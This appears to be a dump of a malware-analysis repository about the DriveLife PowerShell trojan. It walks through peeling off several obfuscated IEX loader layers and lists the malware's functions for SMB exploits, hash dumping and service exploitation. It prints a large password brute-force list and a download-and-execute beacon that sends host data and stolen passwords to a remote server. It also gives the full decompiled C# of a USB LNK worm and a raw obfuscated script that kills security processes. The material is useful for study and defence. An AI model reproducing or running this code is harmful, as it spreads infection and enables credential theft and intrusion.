├── DriveLife
    ├── ifBin
    │   ├── if-1-2.ps1
    │   ├── if-1.0.ps1
    │   ├── if-1.1.ps1
    │   ├── if-1.3.ps1
    │   ├── if-1.4.ps1
    │   ├── if.bin
    │   └── readme.md
    ├── images
    │   ├── BruteSMB.png
    │   └── GetIpaddrs.png
    ├── krBin
    │   ├── kr-1.0.ps1
    │   ├── kr-1.1.ps1
    │   ├── kr-1.2.ps1
    │   ├── kr-1.3.ps1
    │   └── kr.bin
    ├── m6Bin
    │   ├── m6-1-0.ps1
    │   └── m6.bin
    ├── mimikataz-ps1
    │   ├── README.md
    │   ├── mimi.dat
    │   └── mimi.ps1
    └── powershell-beautiful
        ├── domain-include.txt
        ├── if-1.4.ps1
        ├── kr-1.3.ps1
        ├── m6-1-0.ps1
        ├── mimi.ps1
        └── readme.md
└── README.md


/DriveLife/ifBin/if-1-2.ps1:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/jas502n/DriveLife-PsTrojan/7b60e61404616698052b416e41eca49bdacfd782/DriveLife/ifBin/if-1-2.ps1


--------------------------------------------------------------------------------
/DriveLife/ifBin/readme.md:
--------------------------------------------------------------------------------

```
$ hash256 if.bin
989bf47336bf6762a37e90c485199e2cdf0c6ea21ccf6b26845a87e1f8984ab8 if.bin

```


```
$ file ksegmeve.dll
ksegmeve.dll: PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows

$ hash256 ksegmeve.dll
51c91efec0126ac197b3dd4b9045a1dbc2eca9c7c7f43d53ebb99377b4388eec ksegmeve.dll
```


#### References:

2021-09-24 14:24:58 "DriveLife" (驱动人生): an old virus turns up with new tricks

https://www.freebuf.com/articles/system/289740.html

https://edr.sangfor.com.cn/#/information/news_detail?id=761



### PowerShell decryption

The if.bin file begins with I`EX:

```
I`EX $(New-Object IO.StreamReader ($(New-Object IO.Compression.DeflateStream ($(New-Object IO.MemoryStream (,$('edbd0
```

Remove **I`EX** and write the output to the file **if-1.1.bin**:

```
$ pwsh -f if-1.0.bin > if-1.1.bin
```

Contents of if-1.1.bin:

```powershell
SeT sPCz ( [ChaR[ ] ]")''NIOj-]2,11,3[EmAN.)'*rDM*' elBAIrav-TEg(( .| )421]RAHc[,)17]RAHc[+68]RAHc[+37]RAHc[( ECALperC-29]RAHc[,'ImS3' eCAlper- 63]RAHc[,'v3bx'ECALperC-93]RAHc[,'5c1t' ECALperC- )'

)
...
...
...
[aRraY]::REVERse((cHiLditEM VARiabLE:SpCZ).vaLUe) ;(cHiLditEM VARiabLE:SpCZ).vaLUe -JOIN '' | . ( $PshoMe[4]+$pshOME[30]+'x')
```

About PshoMe:

```
PS C:\temp> $PSHome
C:\Windows\System32\WindowsPowerShell\v1.0
PS C:\temp> $PshoMe[4]+$pshOME[30]+'x'
iex
```

Comment out the IEX call, i.e. **| . ( $PshoMe[4]+$pshOME[30]+'x')**, run the script, and write the output to **if-1.2.ps1**:

```powershell
# | . ( $PshoMe[4]+$pshOME[30]+'x')
```

```cmd
PS C:\temp> .\if-1-1.bin > if-1.2.ps1
```

Contents of if-1.2.ps1:

```powershell
(('(t1c5wB69sc=[Convert]::FromBase64String(NDckMcBAD4SsB...
...
...
...
') -CrepLACE 't1c5',[cHAR]39-CrepLACE'xb3v',[cHAR]36 -replACe '3SmI',[cHAR]92-CrepLACE ([cHAR]73+[cHAR]86+[cHAR]71),[cHAR]124) |. ((gET-varIABle '*MDr*').NAmE[3,11,2]-jOIN'')
```

Comment out **|. ((gET-varIABle '*MDr*').NAmE[3,11,2]-jOIN'')**, run the script, and write the output to **if-1.3.ps1**:

```
# |. ((gET-varIABle '*MDr*').NAmE[3,11,2]-jOIN'')
```

```
$ pwsh -f if-1-2.ps1 > if-1.3.ps1
```

Contents of if-1.3.ps1:

```powershell
('wB69sc=[Convert]::FromBase64String(NDckMcBAD4SsBAAAYOgAAAAAW
...
...
...
}').Replace(([CHAR]117+[CHAR]116+[CHAR]72+[CHAR]57),[strINg][CHAR]39).Replace(([CHAR]117+[CHAR]79+[CHAR]118+[CHAR]97),'|').Replace(([CHAR]119+[CHAR]66+[CHAR]54+[CHAR]57),[strINg][CHAR]36).Replace('NDck',[strINg][CHAR]34).Replace(([CHAR]57+[CHAR]101+[CHAR]48),'\').Replace('ir8',[strINg][CHAR]96) | & ( $env:Comspec[4,26,25]-jOiN'')
```

Value of Comspec:

```cmd
PS C:\temp> $env:Comspec
C:\Windows\system32\cmd.exe
```

Comment out the iex:

```
#| & ( $env:Comspec[4,26,25]-jOiN'')
```

Run the script and write the output to the file **if-1.4.ps1**:

```
$ pwsh -f if-1.3.ps1 > if-1.4.ps1
```

Contents of if-1.4.ps1:

```powershell
$sc=[Convert]::FromBase64String("McBAD4SsB
...
...
...
IEX(New-Object Net.WebClient).DownloadString($down_url+'/log.json?V='+$VVERSION+'&'+$comp_name+'&'+$guid+'&'+$mac+'&'+$internet_ip+'&r='+$retry+'&pc1='+$smb_portopen[1].count+'&pc2='+$ms_portopen[1].count+'&pc3='+$ssh_portopen[1].count+'&pc4='+$rdp_portopen[1].count+'&pc5='+$redis_portopen[1].count+'&pc6='+$redis_portopen1[1].count+'&pc7='+$yarn_portopen[1].count+'&pc8='+$logic_portopen[1].count+'&pc9='+$es_portopen[1].count+'&pc10='+$solr_portopen[1].count+'&pci='+$ipaddrs_i.count+'&pco='+$ipaddrs_o.count+'&pcb='+$global:ipaddrs_b+'&mi='+($getpasswd -join "^^")+'&mf='+[Int]$mf)

}catch{}

}



"END"

```

#### Getting IP addresses:
```
function getipaddrs($flag){
    write-host "Get ipaddress..."
    $global:ipaddrs_i = @()
    $global:ipaddrs_o = @()
    $allip = @()
    [string[]]$ipsub = @('192.168.0','192.168.1','192.168.2','192.168.3','192.168.4','192.168.5','192.168.6','192.168.7','192.168.8','192.168.9','192.168.10','192.168.18','192.168.31','192.168.199','192.168.254','192.168.67','10.0.0','10.0.1','10.0.2','10.1.1','10.90.90','10.1.10','10.10.1','172.16.1','172.16.2','172.16.3')
    [string[]]$ipsub_o = @()
```

#### Brute-force passwords

```
[string[]]$global:alluser = @("administrator", "admin")

[string[]]$global:WmicUSER = @("administrator")

[string[]]$global:allpass = @("helloworld", "saadmin", "123456", "test1", "zinch", "g_czechout", "asdf", "Aa123456.", "dubsmash", "password",
    "PASSWORD", "123.com", "admin@123", "Aa123456", "qwer12345", "Huawei@123", "123@abc", "golden", "123!@#qwe", "1qaz@WSX",
    "Ab123", "1qaz!QAZ", "Admin123", "Administrator", "Abc123", "Admin@123", "999999", "Passw0rd", "123qwe!@#", "football",
    "welcome", "1", "12", "21", "123", "321", "1234", "12345", "123123", "123321",
    "111111", "654321", "666666", "121212", "000000", "222222", "888888", "1111", "555555", "1234567",
    "12345678", "123456789", "987654321", "admin", "abc123", "abcd1234", "abcd@1234", "abc@123", "p@ssword", "P@ssword",
    "p@ssw0rd", "P@ssw0rd", "P@SSWORD", "P@SSW0RD", "P@w0rd", "P@word", "iloveyou", "monkey", "login", "passw0rd",
    "master", "hello", "qazwsx", "password1", "Password1", "qwerty", "baseball", "qwertyuiop", "superman", "1qaz2wsx",
    "fuckyou", "123qwe", "zxcvbn", "pass", "aaaaaa", "love", "administrator", "qwe1234A", "qwe1234a", " ",
    "123123123", "1234567890", "88888888", "111111111", "112233", "a123456", "123456a", "5201314", "1q2w3e4r", "qwe123",
    "a123456789", "123456789a", "dragon", "sunshine", "princess", "!@#$%^&*", "charlie", "aa123456", "homelesspa", "1q2w3e4r5t",
    "sa", "sasa", "sa123", "sql2005", "sa2008", "abc", "abcdefg", "sapassword", "Aa12345678", "ABCabc123",
    "sqlpassword", "sql2008", "11223344", "admin888", "qwe1234", "A123456", "OPERADOR", "Password123", "test123", "NULL",
    "user", "test", "Password01", "stagiaire", "demo", "scan", "P@ssw0rd123", "xerox", "compta")
```



Custom functions:

```powershell
function make_smb1_anonymous_login_packet {
function smb1_anonymous_login($sock){
function negotiate_proto_request(){
function smb_header($smbheader) {
function smb1_get_response($sock){
function client_negotiate($sock){
function tree_connect_andx($sock, $target, $userid){
function tree_connect_andx_request($target, $userid) {
function smb1_anonymous_connect_ipc($target){
function make_smb1_nt_trans_packet($tree_id, $user_id) {
function make_smb1_trans2_exploit_packet($tree_id, $user_id, $data, $timeout) {
function make_smb1_trans2_last_packet($tree_id, $user_id, $data, $timeout) {
function send_big_trans2($sock, $smbheader, $data, $firstDataFragmentSize, $sendLastChunk){
function createSessionAllocNonPaged($target, $size) {
function make_smb1_free_hole_session_packet($flags2, $vcnum, $native_os) {
function smb2_grooms($target, $grooms, $payload_hdr_pkt, $groom_socks){
function make_smb2_payload_headers_packet(){
function eb7($target ,$shellcode) {
function createFakeSrvNetBuffer8($sc_size)
function createFeaList8($sc_size, $ntfea){
function make_smb1_login8_packet8 {
function make_ntlm_auth_packet8($user_id) {
function smb1_login8($sock){
function negotiate_proto_request8($use_ntlm)
function smb_header8($smbheader) {
function smb1_get_response8($sock){
function client_negotiate8($sock , $use_ntlm){
function tree_connect_andx8($sock, $target, $userid){
function tree_connect_andx8_request($target, $userid) {
function make_smb1_nt_trans_packet8($tree_id, $user_id) {
function make_smb1_trans2_exploit_packet8($tree_id, $user_id, $data, $timeout) {
function send_big_trans28($sock, $smbheader, $data, $firstDataFragmentSize, $sendLastChunk){
function createSessionAllocNonPaged8($target, $size) {
function make_smb1_free_hole_session_packet8($flags2, $vcnum, $native_os) {
function make_smb2_payload_headers_packet8($for_nx){
function eb8($target,$sc) {
function geth {
function LoadApi
function sid_to_key($sid)
function str_to_key($s)
function NewRC4([byte[]]$key)
function des_encrypt([byte[]]$data, [byte[]]$key)
function des_decrypt([byte[]]$data, [byte[]]$key)
function des_transform([byte[]]$data, [byte[]]$key, $doEncrypt)
function Get-RegKeyClass([string]$key, [string]$subkey)
function Get-BootKey
function Get-HBootKey
function Get-UserName([byte[]]$V)
function Get-UserHashes($u, [byte[]]$hbootkey)
function DecryptHashes($rid, [byte[]]$enc_lm_hash, [byte[]]$enc_nt_hash, [byte[]]$hbootkey)
function DecryptSingleHash($rid,[byte[]]$hbootkey,[byte[]]$enc_hash,[byte[]]$lmntstr)
function Get-UserKeys
function DumpHashes
function Invoke-Mypass {
function Invoke-SE
function ConvertFrom-PacketOrderedDictionary
function New-PacketNetBIOSSessionService
function New-PacketSMBHeader
function New-PacketSMBNegotiateProtocolRequest
function New-PacketSMBSessionSetupAndXRequest
function New-PacketSMBTreeConnectAndXRequest
function New-PacketSMBNTCreateAndXRequest
function New-PacketSMBReadAndXRequest
function New-PacketSMBWriteAndXRequest
function New-PacketSMBCloseRequest
function New-PacketSMBTreeDisconnectRequest
function New-PacketSMBLogoffAndXRequest
function New-PacketSMB2Header
function New-PacketSMB2NegotiateProtocolRequest
function New-PacketSMB2SessionSetupRequest
function New-PacketSMB2TreeConnectRequest
function New-PacketSMB2CreateRequestFile
function New-PacketSMB2ReadRequest
function New-PacketSMB2WriteRequest
function New-PacketSMB2CloseRequest
function New-PacketSMB2TreeDisconnectRequest
function New-PacketSMB2SessionLogoffRequest
function New-PacketNTLMSSPNegotiate
function New-PacketNTLMSSPAuth
function New-PacketRPCBind
function New-PacketRPCRequest
function New-PacketSCMOpenSCManagerW
function New-PacketSCMCreateServiceW
function New-PacketSCMStartServiceW
function New-PacketSCMDeleteServiceW
function New-PacketSCMCloseServiceHandle
function Get-StatusPending
function Get-UInt16DataLength
function Invoke-SMBC
function ConvertFrom-PacketOrderedDictionary
function New-PacketNetBIOSSessionService
function New-PacketSMBHeader
function New-PacketSMBNegotiateProtocolRequest
function New-PacketSMBSessionSetupAndXRequest
function New-PacketSMB2Header
function New-PacketSMB2NegotiateProtocolRequest
function New-PacketSMB2SessionSetupRequest
function New-PacketSMB2TreeConnectRequest
function New-PacketSMB2CreateRequest
function New-PacketSMB2FindRequestFile
function New-PacketSMB2QueryInfoRequest
function New-PacketSMB2ReadRequest
function New-PacketSMB2WriteRequest
function New-PacketSMB2CloseRequest
function New-PacketSMB2TreeDisconnectRequest
function New-PacketSMB2SessionLogoffRequest
function New-PacketSMB2IoctlRequest()
function New-PacketSMB2SetInfoRequest
function New-PacketNTLMSSPNegotiate
function New-PacketNTLMSSPAuth
function Get-UInt16DataLength
function smbghost_check($tip) {
function check_vul($sock) {
function smbghost_exec($ip,$cmd){
function unpack($pkt_str) {
function pack($pkt) {
function reconnect(){
function sock_recv($sock) {
function smb_negotiate($sock){
function Smb2CompressedTransform($compressed_data, $decompressed_size, $data){
function smb_compress($sock, $compressed_data, $decompressed_size, $data){
function MDL($phys_addr){
function write_primitive($data,$addr){
function write_srvnet_buffer_hdr($data, $offset){
function read_physmem_primitive($phys_addr){
function get_phys_addr($va_addr){
function get_pte_va($addr){
function overwrite_pte($addr){
function build_shellcode(){
function search_hal_heap(){
function search_selfref(){
function find_pml4_selfref(){
function find_low_stub(){
function do_rce(){
function copyrun {
function db_query{
function db_gencmd{
function mssqlrun {
function sshbrute($ip,$user,$pass,$ssh_cmd){
function isPubIP {
function getipaddrs($flag){
function localscan {
function redisexec($ip,$port,$cmd){
function sendandread($sock,$str){
function yarnexec($ip,$cmd){
function urlpost($ip,$path,$data){
function logicexec($ip,$cmd){
function esexec($ip,$cmd){
function urlrequest($ip,$path,$data){
function solrexec($ip,$cmd){
function urlrequest($ip,$path,$data){
function f1(data){new java.lang.ProcessBuilder["(java.lang.String[])"]($cmdlist).start()}
function dockerexec($ip,$cmd){
function urlrequest($ip,$path,$data){
function Gen-NTLM($str){
```


#### ksegmeve.dll decompiled with dnSpy
https://github.com/dnSpy/dnSpy/releases

```
using System;
using System.Collections.Generic;
using System.IO;
using System.Threading;

namespace USB
{
    // Token: 0x02000002 RID: 2
    public class USBLNK
    {
        // Token: 0x06000001 RID: 1 RVA: 0x00002050 File Offset: 0x00000250
        public static void Main1(string b1, string b2, string b3)
        {
            USBLNK.gb3 = b1;
            USBLNK.gb6 = b2;
            USBLNK.jsdata = b3;
            // The processed-drive list is cleared every 10 seconds; drives are rescanned every 5 seconds.
            Timer timer = new Timer(new TimerCallback(USBLNK.ResetBlacklist), null, 10000, 10000);
            for (;;)
            {
                USBLNK.BaseMode();
                Thread.Sleep(5000);
            }
        }

        // Token: 0x06000002 RID: 2 RVA: 0x000020A5 File Offset: 0x000002A5
        private static void ResetBlacklist(object state)
        {
            USBLNK.blacklist.Clear();
        }

        // Token: 0x06000003 RID: 3 RVA: 0x000020B4 File Offset: 0x000002B4
        // Creates a hidden "UTFsync" directory in the drive root.
        private static bool CreateHomeDirectory(string drive)
        {
            try
            {
                DirectoryInfo directoryInfo = Directory.CreateDirectory(drive + "UTFsync");
                directoryInfo.Attributes = (FileAttributes.Hidden | FileAttributes.Directory);
                return true;
            }
            catch
            {
            }
            return false;
        }

        // Token: 0x06000004 RID: 4 RVA: 0x00002100 File Offset: 0x00000300
        // Only ready removable or network drives with free space, formatted FAT32 or NTFS.
        private static bool IsSupported(DriveInfo drive)
        {
            return drive.IsReady && drive.AvailableFreeSpace > 1024L && (drive.DriveType == DriveType.Removable || drive.DriveType == DriveType.Network) && (drive.DriveFormat == "FAT32" || drive.DriveFormat == "NTFS");
        }

        // Token: 0x06000005 RID: 5 RVA: 0x00002164 File Offset: 0x00000364
        private static bool CheckBlacklist(string name)
        {
            return name == "UTFsync" || name == "System Volume Information" || name == ".BIN";
        }

        // Token: 0x06000006 RID: 6 RVA: 0x000021A0 File Offset: 0x000003A0
        // Writes the blue3/blue6 .lnk and .bin files and readme.js, then creates UTFsync\inf_data as the marker file.
        private static bool Infect(string drive)
        {
            bool result;
            if (USBLNK.blacklist.Contains(drive))
            {
                result = true;
            }
            else
            {
                USBLNK.CreateLnk(drive, "blue3.bin", USBLNK.gb3);
                USBLNK.CreateLnk(drive, "blue6.bin", USBLNK.gb6);
                USBLNK.CreateJs(drive, "readme.js", USBLNK.jsdata);
                try
                {
                    File.Create(drive + "UTFsync\\inf_data");
                    return true;
                }
                catch (Exception ex)
                {
                    Console.WriteLine(ex.Message);
                }
                result = false;
            }
            return result;
        }

        // Token: 0x06000007 RID: 7 RVA: 0x00002238 File Offset: 0x00000438
        private static bool CreateJs(string drive, string fname, string gb)
        {
            FileStream fileStream = new FileStream(drive + fname, FileMode.Create);
            byte[] array = Convert.FromBase64String(gb);
            fileStream.Write(array, 0, array.Length);
            fileStream.Close();
            Console.WriteLine(array.Length);
            return true;
        }

        // Token: 0x06000008 RID: 8 RVA: 0x00002368 File Offset: 0x00000568
        private static bool CreateLnk(string drive, string binfname, string gb)
        {
            // Fixed shell link header (76 bytes) followed by the start of the item ID list.
            byte[] array = new byte[]
            {
                76, 0, 0, 0, 1, 20, 2, 0, 0, 0, 0, 0, 192, 0, 0, 0,
                0, 0, 0, 70, 129, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
                0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
                0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
                0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 156, 0, 20, 0,
                31, 128, 32, 32, 236, 33, 234, 58, 105, 16, 162, 221, 8, 0, 43, 48,
                48, 157, 134, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 106,
                0, 0, 0, 0, 0, 0
            };
            byte[] array2 = new byte[]
            {
                58, 0, 92
            };
            // UTF-16 strings "Flash Player" and "Manage Flash Player Settings", then trailing structure bytes.
            byte[] array3 = new byte[]
            {
                0, 0, 0, 70, 0, 108, 0, 97, 0, 115, 0, 104, 0, 32, 0, 80,
                0, 108, 0, 97, 0, 121, 0, 101, 0, 114, 0, 0, 0, 77, 0, 97,
                0, 110, 0, 97, 0, 103, 0, 101, 0, 32, 0, 70, 0, 108, 0, 97,
                0, 115, 0, 104, 0, 32, 0, 80, 0, 108, 0, 97, 0, 121, 0, 101,
                0, 114, 0, 32, 0, 83, 0, 101, 0, 116, 0, 116, 0, 105, 0, 110,
                0, 103, 0, 115, 0, 0, 0, 0, 0, 16, 0, 0, 0, 5, 0, 0,
                160, 3, 0, 0, 0, 20, 0, 0, 0, 0, 0, 0, 0
            };
            // One .lnk per drive letter D through K, named <letter><binfname with .lnk>.
            for (char c = 'D'; c <= 'K'; c += '\u0001')
            {
                FileStream fileStream = new FileStream(drive + c.ToString() + binfname.Replace(".bin", ".lnk"), FileMode.Create);
                fileStream.Write(array, 0, array.Length);
                byte[] array4 = new byte[4];
                int num = binfname.Length + 4;
                array4[0] = (byte)(num & 255);
                array4[1] = (byte)((num & 65280) >> 8);
                array4[2] = 13;
                array4[3] = 0;
                fileStream.Write(array4, 0, array4.Length);
                byte[] array5 = new byte[]
                {
                    (byte)(c & 'ÿ'),
                    (byte)((c & '＀') >> 8)
                };
                fileStream.Write(array5, 0, array5.Length);
                fileStream.Write(array2, 0, array2.Length);
                foreach (char c2 in binfname)
                {
                    byte[] array6 = new byte[]
                    {
                        (byte)((c2 & '＀') >> 8),
                        (byte)(c2 & 'ÿ')
                    };
                    fileStream.Write(array6, 0, array6.Length);
                }
                fileStream.Write(array3, 0, array3.Length);
                fileStream.Close();
            }
            FileStream fileStream2 = new FileStream(drive + binfname, FileMode.Create);
            byte[] array7 = Convert.FromBase64String(gb);
            fileStream2.Write(array7, 0, array7.Length);
            fileStream2.Close();
            Console.WriteLine(array7.Length);
            return true;
        }

        // Token: 0x06000009 RID: 9 RVA: 0x00002540 File Offset: 0x00000740
        // A drive counts as already processed when UTFsync\inf_data exists on it.
        private static void BaseMode()
        {
            DriveInfo[] drives = DriveInfo.GetDrives();
            foreach (DriveInfo driveInfo in drives)
            {
                if (!USBLNK.blacklist.Contains(driveInfo.Name))
                {
                    Console.WriteLine("Detect drive:" + driveInfo.Name);
                    if (USBLNK.IsSupported(driveInfo))
                    {
                        if (!File.Exists(driveInfo + "UTFsync\\inf_data"))
                        {
                            Console.WriteLine("Try to infect " + driveInfo.Name);
                            if (USBLNK.CreateHomeDirectory(driveInfo.Name) && USBLNK.Infect(driveInfo.Name))
                            {
                                USBLNK.blacklist.Add(driveInfo.Name);
                            }
                        }
                        else
                        {
                            Console.WriteLine(driveInfo.Name + " already infected!");
                            USBLNK.blacklist.Add(driveInfo.Name);
                        }
                    }
                    else
                    {
                        USBLNK.blacklist.Add(driveInfo.Name);
                    }
                }
            }
        }

        // Token: 0x04000001 RID: 1
        private const string home = "UTFsync";

        // Token: 0x04000002 RID: 2
        private const string inf_data = "\\inf_data";

        // Token: 0x04000003 RID: 3
        public static List<string> blacklist = new List<string>();

        // Token: 0x04000004 RID: 4
        public static string gb3;

        // Token: 0x04000005 RID: 5
        public static string gb6;

        // Token: 0x04000006 RID: 6
        public static string jsdata;
    }
}

```


--------------------------------------------------------------------------------
/DriveLife/images/BruteSMB.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/jas502n/DriveLife-PsTrojan/7b60e61404616698052b416e41eca49bdacfd782/DriveLife/images/BruteSMB.png


--------------------------------------------------------------------------------
/DriveLife/images/GetIpaddrs.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/jas502n/DriveLife-PsTrojan/7b60e61404616698052b416e41eca49bdacfd782/DriveLife/images/GetIpaddrs.png


--------------------------------------------------------------------------------
/DriveLife/krBin/kr-1.0.ps1:
--------------------------------------------------------------------------------
147 | ,yWutsohyIP+yIPsvsyWu'+'yIP+yIP ,yWuedaegpuyIP+yIP-otuayWu ,yWyIP+yIP'+'uedaegpuyWu ,yWu1mmayyWyIP+yIPu ,yWun'+'obraCyWu ,yWuetaGreniMyWu'+' ,yW'+'udrenimyWu'+' ,yWu*girmxyWu,yWu*RyIP+yIPMXyWu ,yWuofnismyWu,yyIP+yIPWu02WDyWu,yWutluaFreWyWu,yWurgMreWyWu,yWuCSyWu = reniMyIP+yIPtRJ 148 | 149 | 150 | } 151 | 152 | lluNtRyIP+y'+'IPJ >2 F/ ksaTtRJ NT/ etyIP+yIPeleD/ ex'+'e.sks'+'aThcS 153 | 154 | { )yIP+yIPe'+'maNksaTtRJ yIP+yIPni ksaTtRJ( hcaeroyI'+'P+yIPf 155 | 156 | '+'yWu...sksat llikyWu tsoh-eyIP+yIPtirw 157 | 158 | yWueroCsn'+'DCEyWu,yWueroCsnDyWu,yWuecivreS swodniW rof ecivyIP+yIPres etadpUyyIP+yIPWu,yIP+yIPyWueroCsnDyWu,yWunim'+'dA-TARemiLyWu,yWunromeDpsiHyWu,yWutropysplcrewyWu,yWutuotupnIetlbaTyWu,yWuslaitnederCyWu,yWusrevreSbeWyWu,yWunacSsnDyWu,yIP+yIPyWusryI'+'P+yIPev'+'irdDyWu,yWushtooteulByWu,yWucvsNAwWyWu,yWyIP+yIPuisNtsofcsiMyWu,yWuredivorPpuorGemoHyWu'+',yWus'+'gifnoCyIP+yIPgniPelgyIP+yIPooGyWu,yWuksaTvaRyWuyIP+yIP,yWuhsalFyyIP+yIPWu,yWukrowemarfteNyWu,yWutsofcsiMyWu,yWudmcyksyyIP+yIPWu,yWuaMETSYSyWu,yWu2SNDyWu,yWuMETSYSyWu,yWyIP+yIP'+'uSNDyWu,yWu4etadpUyWu,yWu3etadyIP+yIPpUyWu,yWu2etadpUyWu,yWu1etadpUyWu,yW'+'uetadpUyWu,yWukcehC ytiruceyIP+yIPS goL '+'metsySyWu,yWusks'+'aTgoLswodniWyWu,yW'+'uSII'+'yWu'+',yWu3reyalPhsalFyWu,yWu2reyalPhsalyIP+'+'yIP'+'FyWu,yWu1reyalPhsalFyWuyIP+yIP,yWureyalPhsal'+'FebodAyWu,y'+'Wu3etadpUswodniWyWu,yWu2eyIP+yIPtadpUsw'+'odniWyyIP+yIPWu,yWu1etadpUsw'+'odniWyWuyIP+yIP,yWu'+'swodniw_etadpUyWu,yWuetadpU_swodniWyWu,yWuyrroSyWu,yWumgnyWu ,yIP+yIPyWum'+'gyWu ,yWustcudorp rof ecivres yIP+y'+'IPetadpUyWu ,yWuretrop'+'eR '+'stc'+'udoyIP+yIPrP elcarOyWu,yWuecivreS meyIP+'+'yI'+'PtsySbuS reloopSyWu ,yWuy'+'rtemeleT tfosor'+'ciMyWu ,yWuetadpyIP+yIPU avaJ elca'+'rOyWu ,yWuavaJ elcar'+'OyWu ,yWukoyWuyIP+yIP ,yWu3asyMyWu ,yWu2asyMyWu ,yW'+'u1asyMyWu ,yWuasyMyWu,yWu1yyIP+yIPmyW'+'u = emaNksaTtRJ 159 | 160 | 161 | } 162 | 163 | vrStRJ eteleyIP+yIPD exe.CS = lluNtRJ'+' 164 | 165 | vrStRJ potS exe.CS = lluNtRJ 166 | 167 | delbasiD 
=tyIP'+'+yIPratS vrStRJ gifnoCyIP+yIP exe.CS = lluNtRJ 168 | 169 | yIP+yI'+'P{ )emaNvrStRJ ni vrSt'+'RJ(hcaerof 170 | yIP+yIP 171 | yWu...secivres llyIP+yIPikyy'+'IP+yIPWu tsoh-etirw 172 | 173 | yWyIP+yIPuskoyIP+yIPoBpilCy'+'Wu,yWu23pledsaHniWyWu,yWu23pledadsa'+'HniWyWu,yWu23pleHnss'+'ssssiWyWu,yyIP+yIPWuRLC teN.yWu,yWurevreSorPrepuSyWu,yW'+'uzeihyIP+yIPreyIP+yIPSyWu,yWurevreS SNDyWu,yWulanoitaZyyIP+yIPWu,y'+'WuVStsnIxAyWu,yWyIP+yIPunoitazimitpo_rlcyWu,yWusretats_tenpsayWu,yWuscvSpleHniWyWuyIP+yIP,yWuMOC'+'yIP+yIP.NC.SODD.WWWyWu,yWuecivreSNVsserpxEyWu,yWusrevreSyIP+yIPbeWyWuyIP+yIP,yWu1rgmksatyyIP+yI'+'PWu,yWusvreSpAimwyWu,yWusvrSpAimwyWu,y'+'WuMGLAyWu,yWuecivreSifiWyWu,yWuLSDRSyWu,yWucvSepMyWu,yWuSCESPIyWu,yWusyTr063yWu,yWuxxxyftXyWu,yWuayftXyWu,yWuyIP+yIPyftXyWu,yWucvStluaVniW'+'yWu,yWuresualNcvSyWu,yWusreganaM swodniWyWu,yWuetad'+'pU_swodniWyWu,yWu0.2cvscessmyWu,yWu1.2cvscessmyWu,yWucvSni'+'WyWu,yWuSxSyWu,yWuyIP+yIPqeyalP aideyIP+yIPM noitpyrcnSy'+'Wu ,yWuAIDIVN aideM vitcAqmsMteyIP+yIPNyyIP+yIPWu '+',yWur'+'egnaMtpEcpRyWu ,yWurevresyIP'+'+yIPmaSyWuyIP+yIP ,yWu46pleHniWyWu,yyIP'+'+yIPWu23pleHnyIP+yIPiWyWu,yWuipwlanoitaNyWu,yWueialanoitaNyWu,yWuyIP+yIPllmlanoitaNyWu ,yWullolanoitaNyWu ,yWulanommitaNyyIP+yIPWyIP+yIPu ,yWulaaanoit'+'a'+'Ny'+'Wu ,yWulanoitaNyyIP+yIPWu,yWulduoguoSyWu ,yWuNSnPndmWyWu yIP+yIP,yWumgDaTyWu ,yWutgmsysyWu ,yWyIP+yIPuRLCyWu ,yWuetadpuelcarOyWu '+',yWumetsysyWu ,yyIP+'+'yIPWutyIP+yIP'+'fosorciMyyIP+'+'yIPWu ,yWuss'+'aslyWu ,yWuyrtemeleT tfosorciMyWu ,yWut'+'syIP+yIPoHSVSyWu ,yWuvrSdpWniWx'+'yWu = emaNyIP+yIPvyIP+yIPrStRJ 174 | 175 | { relliK noitc'+'nuF 176 | 177 | } 178 | 179 | 0.0.0.0 pitRJ eteyIP+yIPled'+' etuor 180 | 181 | {)pitRJ(pInabnu noitcnuf 182 | 183 | } 184 | 185 | p- yIP+yIP1 FI 0.0.0.0 pitRyIP+yIPJ dda etuor yIP+yIP 186 | 187 | {yIP+yIP)pitRJ(pInab yIP+yIPno'+'itcnuf 188 | 189 | } 190 | 191 | yIP+yIP}{hctac} 192 | 193 | )lru'+'tRyIP+yIPJyIP+yI'+'P(gnirtSdaolnwoD.)tneilCbeW.teN tcejbO-yIP+yIPweN( 194 | 195 | } yIP+yIP 196 | 197 
| yWuemanptRJyIP+'+'yIP&di'+'pmtRJ&yxorpmsitRJ&pitRJ&diugtRJ&camtRJ&eyIP+yIPman_pmyIP+yIPoctRyIP+yIPJ&yrter:labolgtRJ&noiyIP+yIPsrevtRJ?nosj.killeryIP+yIP/lru'+'_nwodtRJyWu = lrutRJ yIP+yIP 198 | 199 | emaN ytreporPdnapxE- tyIP+yIPcejbO-tceleS 1Se dipmtRyIP+yIPJ di- ssecorP-teG = emanpyIP+yIPtRJ 200 | 201 | { esle } 202 | 203 | yWudiugtRJ&camtRJ&eman_pm'+'octRJ&yrter:labolgtRJ&noisrevtRJ'+'?nosj.oper_lk/lru_'+'nwod'+'tyIP+yIPRJyWu = lrutRJ yIP+yIP 204 | 205 | {)fDifyIP+yIPDi qe- pitRJ(fi 206 | 207 | EMANRETUPMOC:vnetRJ '+'= emyIP+yIPan_pmoctRJ 208 | 209 | DIUU.)tcudorPmetsySretuyIP+yIP'+'pmoC_23niW ty'+'IP+yIPcejboimw-teg( = diugtRJ yIP+yIP 210 | 211 | 1 tsrif- yIP+yIPtyIP+yIPcejbo-tceles 1S'+'e ss'+'erddacaM.)}eyIP'+'+yIPurttRJ QE- delbanepi._tRJ{ erehw 1Se noitarugifnoCretpadAyIP+yIPkrowteN_23niW tcejbOimW-tyIP+yIPeG( = cayIP+yIPmtRJ 212 | 213 | {yrt 214 | '+' 215 | {'+')dipmtRJ,yxorpmsitRJ,pitRJ(gsmdyIP+yIPnes noitcnuf 216 | 217 | } 218 | 219 | sdi'+'ptRJ nrut'+'er 220 | 221 | }dissecorp._tRJ{hcaerof1Se})emanrteg( qe- eman._tRJ ro- yWu*exe6yIP+yIPmtRJ*yWu ekil- hta'+'p._tRJ 